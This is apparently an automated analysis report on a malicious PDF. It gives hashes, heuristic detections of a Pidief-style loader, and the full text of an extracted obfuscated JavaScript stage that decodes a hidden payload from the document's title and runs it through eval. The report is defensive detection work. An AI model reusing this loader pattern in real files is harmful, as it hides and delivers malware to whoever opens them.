PDF malware analysis — malicious · 2b811b3fd1b84139

MALICIOUS

PDF

44.5 KB First seen: 2026-05-09

MD5: b7b3b1043a2bf22185ade54eb55de8be SHA-1: bf82ecac7b3093d59fe10d9f1b5eb112df8da66c SHA-256: 2b811b3fd1b84139d87b6d66bc47af9425a049b672b5b4bbcefe5e94a2deabb0

86 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File: Malicious JavaScript

The PDF document was flagged as suspicious by a machine learning classifier with high confidence. Static analysis revealed embedded JavaScript, which is often used to execute malicious code or exploit vulnerabilities within PDF viewers. The presence of JavaScript actions and embedded JS streams indicates an attempt to run code, likely for malicious purposes such as downloading further malware or phishing.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xAF97 439 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xAF97	439 bytes
SHA-256: `e739d5bd9afae53f0ff5afc5451610b31d1da7327e707ee2e3c31ba2a8dea1f2`
Preview script First 1,000 lines of the extracted script qwe = ('nhsthn','ntrht').substr; var g = qwe(); t='le'; a=["e","a","n","b","w",'v']; e=g[a[0]+a[5]+a[1]+t[0]]; gaa=''; smd=('qwrwqr','tit'); e('bec=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t); aakvk=e('String.fr'+bec.substr(0,10)); lnnd = e(bec.substr(10)['replace'](/u/g,',')); e('k=lnnd.length'); for (i = 0; i < k; i+=2) { okt = lnnd[i+1] + ('erybjkerl',lnnd[i]); gaa += aakvk(okt); } e(gaa);

SHA-256: e739d5bd9afae53f0ff5afc5451610b31d1da7327e707ee2e3c31ba2a8dea1f2

Preview script

First 1,000 lines of the extracted script

qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
gaa='';
smd=('qwrwqr','tit');
e('bec=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
aakvk=e('String.fr'+bec.substr(0,10));
lnnd = e(bec.substr(10)['replace'](/u/g,','));
e('k=lnnd.length');
for (i = 0; i < k; i+=2) {
	okt = lnnd[i+1] + ('erybjkerl',lnnd[i]);
	gaa += aakvk(okt);
}
e(gaa);

Open this report in the interactive analyzer, or submit your own file for analysis.